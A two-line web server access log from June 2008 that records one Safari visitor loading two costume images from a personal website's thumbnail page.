71.240.209.142 - - [25/Jun/2008:23:56:15 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:15 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
